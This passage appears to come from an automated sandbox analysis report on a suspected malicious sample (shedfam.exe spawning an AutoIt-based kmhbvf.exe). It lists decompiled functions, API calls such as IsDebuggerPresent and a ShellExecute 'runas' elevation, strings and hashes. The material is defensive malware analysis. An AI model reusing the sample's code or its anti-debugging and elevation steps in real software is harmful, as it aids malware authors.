							E00405CFB(0x420580, 0x425000);
							E00405C59(0x425000, _t22);
							E0040140B(6);
							E00405CFB(0x425000, 0x420580);
						}
						L11:
						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004048B6(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404003(0x413);
				return 0;
			}

0x00404f43
0x00404f68
0x00404f88
0x00404f8b
0x00404f8e
0x00404fa5
0x00404fab
0x00404fb2
0x00404fb9
0x00404fc0
0x00404fc5
0x00404fcb
0x00000000
0x00404fdb
0x00404f75
0x00404fc8
0x00404fc8
0x00000000
0x00404fc8
0x00404f81
0x00404f83
0x00000000
0x00404f83
0x00404f49
0x00000000
0x00000000
0x00404f50
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404F6D
CallWindowProcA.USER32 ref: 00404FDB

Part of subcall function 00404003: SendMessageA.USER32 ref: 00404015

Strings

, xrefs: 00404F45

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD

Uniqueness

Uniqueness Score: -1.00%

Function 004036B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036B9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f53c;
				_t3 = E0040369E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f53c =  *0x41f53c & 0x00000000;
				return _t3;
			}

0x004036ba
0x004036c2
0x004036c9
0x004036cc
0x004036cc
0x004036ce
0x004036d3
0x004036da
0x004036e0
0x004036e4
0x004036e5
0x004036ed

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74D0F560,00403690,00000000,00403482,00000000), ref: 004036D3
GlobalFree.KERNEL32 ref: 004036DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3916508600
Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405835 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405835(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405836
0x00405840
0x00405842
0x00405849
0x00405851
0x00000000
0x00000000
0x00000000
0x00405851
0x00405853
0x00405858

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\shedfam.exe,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 0040583B
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\shedfam.exe,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 00405849

Strings

C:\Users\user\Desktop, xrefs: 00405835

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405947 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405947(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405953
0x00405955
0x0040597d
0x00405962
0x00405967
0x00405972
0x00000000
0x0040598f
0x0040597b
0x0040597b
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kmhbvf.exePID: 4820, Parent PID: 2620COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	4%
Signature Coverage:	3.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	110

Executed Functions

Function 00EE5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE526C
IsDebuggerPresent.KERNEL32 ref: 00EE527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00EE52E6

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

Part of subcall function 00EDBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDBC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00EE5366
MessageBoxA.USER32 ref: 00F20B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00F20B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F86D10), ref: 00F20BE9
ShellExecuteW.SHELL32(00000000), ref: 00F20BF0

Part of subcall function 00EE514C: GetSysColorBrush.USER32(0000000F), ref: 00EE5156
Part of subcall function 00EE514C: LoadCursorW.USER32(00000000,00007F00), ref: 00EE5165
Part of subcall function 00EE514C: LoadIconW.USER32(00000063), ref: 00EE517C
Part of subcall function 00EE514C: LoadIconW.USER32(000000A4), ref: 00EE518E
Part of subcall function 00EE514C: LoadIconW.USER32(000000A2), ref: 00EE51A0
Part of subcall function 00EE514C: LoadImageW.USER32 ref: 00EE51C6
Part of subcall function 00EE514C: RegisterClassExW.USER32 ref: 00EE521C

Part of subcall function 00EE50DB: CreateWindowExW.USER32 ref: 00EE5109
Part of subcall function 00EE50DB: CreateWindowExW.USER32 ref: 00EE512A
Part of subcall function 00EE50DB: ShowWindow.USER32(00000000), ref: 00EE513E
Part of subcall function 00EE50DB: ShowWindow.USER32(00000000), ref: 00EE5147

Part of subcall function 00EE59D3: _memset.LIBCMT ref: 00EE59F9
Part of subcall function 00EE59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE5A9E

Strings

AutoIt, xrefs: 00F20B23
runas, xrefs: 00F20BE4
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00F20B28

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 7b081592a4944e44f99c950635e57286666d9a4a7731b14fd00c54817be79778
Instruction ID: 55c4299094d9b380a05404de6de23ef75e9c91bf432e7bb293aaecd01b1d56c2
Opcode Fuzzy Hash: 7b081592a4944e44f99c950635e57286666d9a4a7731b14fd00c54817be79778
Instruction Fuzzy Hash: 1451F3329183CCAADF11FBB1AC06EEE7BB4AF45344F1020AAF551B2163DEB15545EB21

Uniqueness

Uniqueness Score: -1.00%

Function 03AF0227 Relevance: 16.4, APIs: 4, Strings: 5, Instructions: 622
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03AF0489

Strings

-, xrefs: 03AF0241
A, xrefs: 03AF0373
s, xrefs: 03AF024D
r, xrefs: 03AF0249
;, xrefs: 03AF023D

Memory Dump Source

Source File: 00000001.00000002.256622891.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3af0000_kmhbvf.jbxd

Similarity

API ID: CreateFile
String ID: -$;$A$r$s
API String ID: 823142352-4219510768
Opcode ID: 7db162c2ebd74bc67c1b738f005f6c91a681447e15ce687d6cfe59f8b2e995a1
Instruction ID: fec394b111e5f2c4b88725e83b8d471c1e0addcd0f46a4ac04d904735c0060d9
Opcode Fuzzy Hash: 7db162c2ebd74bc67c1b738f005f6c91a681447e15ce687d6cfe59f8b2e995a1
Instruction Fuzzy Hash: AF52972095D2D9ADDF02CBF984507FDBFB05F2A102F1845DAE5E1E6283D13A834ADB21

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00EE5D40

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

GetCurrentProcess.KERNEL32(?,00F60A18,00000000,00000000,?), ref: 00EE5E07
IsWow64Process.KERNEL32(00000000), ref: 00EE5E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00EE5E54
FreeLibrary.KERNEL32(00000000), ref: 00EE5E5F
GetSystemInfo.KERNEL32(00000000), ref: 00EE5E90
GetSystemInfo.KERNEL32(00000000), ref: 00EE5E9C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b9cb1e6020257f46666b6f82a882619f6cba6fc9304b4748ac4cdc8753260f7e
Instruction ID: 0927d377f52d49894747d762ec52a224048a3f9f96cb1dedaed8f02eba271e05
Opcode Fuzzy Hash: b9cb1e6020257f46666b6f82a882619f6cba6fc9304b4748ac4cdc8753260f7e
Instruction Fuzzy Hash: 16910832849BC8DEC731CB7594500ABFFE5AF3A304F980A9ED0C7A3A12D630A548D759

Uniqueness

Uniqueness Score: -1.00%

Function 00EDBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00EDBF57

Part of subcall function 00ED52B0: PeekMessageW.USER32 ref: 00ED52E6

Sleep.KERNEL32(0000000A,?,?), ref: 00F136B5

Strings

@GUI_CTRLHANDLE, xrefs: 00F13816
@GUI_CTRLID, xrefs: 00F1376C
@GUI_WINHANDLE, xrefs: 00F137C1
@TRAY_ID, xrefs: 00F13FCD
CALL, xrefs: 00EDC277
@COM_EVENTOBJ, xrefs: 00F13D2E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: a74b0580b14c24a072124d5eb9cacc586f8504dbcd905a83ef15ba305484faea
Instruction ID: 1cb46027a231d33d18f1a8b6349d73ded1f0ea621b9c9e0954df206d9ddcc65e
Opcode Fuzzy Hash: a74b0580b14c24a072124d5eb9cacc586f8504dbcd905a83ef15ba305484faea
Instruction Fuzzy Hash: 24C2DF70608341DFC728DF24C844BAAB7E5FF84304F14491EE49AA73A1DB75E985EB82

Uniqueness

Uniqueness Score: -1.00%

Function 00ED33E6 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00ED3444
RegisterClassExW.USER32 ref: 00ED346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00ED347F
InitCommonControlsEx.COMCTL32(?), ref: 00ED349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00ED34AC
LoadIconW.USER32(000000A9), ref: 00ED34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00ED34D1

Strings

TaskbarCreated, xrefs: 00ED3474
0, xrefs: 00ED3426
+, xrefs: 00ED342D
AutoIt v3 GUI, xrefs: 00ED3460

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 31abea4de11e6fa8f901262cdf552ec8fc2a84572e7efbad6e0611bff115a5b2
Instruction ID: d31059297a7ea2ea5f76f4ad3768afd1a1d60220f1979ae01f66a22703f1e0d8
Opcode Fuzzy Hash: 31abea4de11e6fa8f901262cdf552ec8fc2a84572e7efbad6e0611bff115a5b2
Instruction Fuzzy Hash: E231697185530DAFDB409FA4DC88ACEBBF0FB09320F20415AE590E62A0DBB95545EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00ED3444
RegisterClassExW.USER32 ref: 00ED346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00ED347F
InitCommonControlsEx.COMCTL32(?), ref: 00ED349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00ED34AC
LoadIconW.USER32(000000A9), ref: 00ED34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00ED34D1

Strings

TaskbarCreated, xrefs: 00ED3474
0, xrefs: 00ED3426
+, xrefs: 00ED342D
AutoIt v3 GUI, xrefs: 00ED3460

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f5f30400ea2f4a20269815f0ead39b0de237167786ad3d1125704be1d1902339
Instruction ID: a46e8f28e7ce370b3af51ca7794c5ce5cbf87c420c793c8db53e5a6b7571ce67
Opcode Fuzzy Hash: f5f30400ea2f4a20269815f0ead39b0de237167786ad3d1125704be1d1902339
Instruction Fuzzy Hash: 9D21E7B191430DAFDB00AF94ED49BDE7BF4FB08700F20415AF521A62A0DBB15540EF95

Uniqueness

Uniqueness Score: -1.00%

Function 00EE29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EE2A3E,?,00008000), ref: 00EF0BA7

Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4

SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00EE2ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00EE2C2C

Part of subcall function 00EE3EBE: _wcscpy.LIBCMT ref: 00EE3EF6

Part of subcall function 00EF386D: _iswctype.LIBCMT ref: 00EF3875

Strings

Bad directive syntax error, xrefs: 00F2008F
Error opening the file, xrefs: 00F1FD33, 00F1FDAA
EA06, xrefs: 00F1FD48
AU3!, xrefs: 00EE2A93
Unterminated string, xrefs: 00F200D6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00F1FD17

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: 11048dafd2dda09d4785fd9bb2c53cc0005fc6701b0b4fcc541a479639100e74
Instruction ID: bf7a5d4a00870c13b4a3e7c23165cdfefa57ca012901e1915bdfeccdd7323752
Opcode Fuzzy Hash: 11048dafd2dda09d4785fd9bb2c53cc0005fc6701b0b4fcc541a479639100e74
Instruction Fuzzy Hash: 2002E4715083859FC724EF25C841AAFBBE5FF89314F10092DF599A32A2DB30D989DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00EE3094), ref: 00EF00ED

Part of subcall function 00EF08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00EE309F), ref: 00EF08E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EE30E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F201BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F201FB
RegCloseKey.ADVAPI32(?), ref: 00F20239
_wcscat.LIBCMT ref: 00F20292

Strings

\Include\, xrefs: 00EE309F
Include, xrefs: 00F201B1, 00F201F2
Software\AutoIt v3\AutoIt, xrefs: 00EE30D8
\, xrefs: 00F202B5

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 14e4b2743da312b79000f687a2556fd572ebf13eba33bb32a722a0b05331a71a
Instruction ID: aace85988f23d579d1ca1439a565ce78b322f2e0bc463286145769be7fd9702d
Opcode Fuzzy Hash: 14e4b2743da312b79000f687a2556fd572ebf13eba33bb32a722a0b05331a71a
Instruction Fuzzy Hash: A871AE724093499EC304EF65EC4196BBBE8FF86390F50192EF545D32A1EF309949EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EE514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00EE5156
LoadCursorW.USER32(00000000,00007F00), ref: 00EE5165
LoadIconW.USER32(00000063), ref: 00EE517C
LoadIconW.USER32(000000A4), ref: 00EE518E
LoadIconW.USER32(000000A2), ref: 00EE51A0
LoadImageW.USER32 ref: 00EE51C6
RegisterClassExW.USER32 ref: 00EE521C

Part of subcall function 00ED3411: GetSysColorBrush.USER32(0000000F), ref: 00ED3444
Part of subcall function 00ED3411: RegisterClassExW.USER32 ref: 00ED346E
Part of subcall function 00ED3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00ED347F
Part of subcall function 00ED3411: InitCommonControlsEx.COMCTL32(?), ref: 00ED349C
Part of subcall function 00ED3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00ED34AC
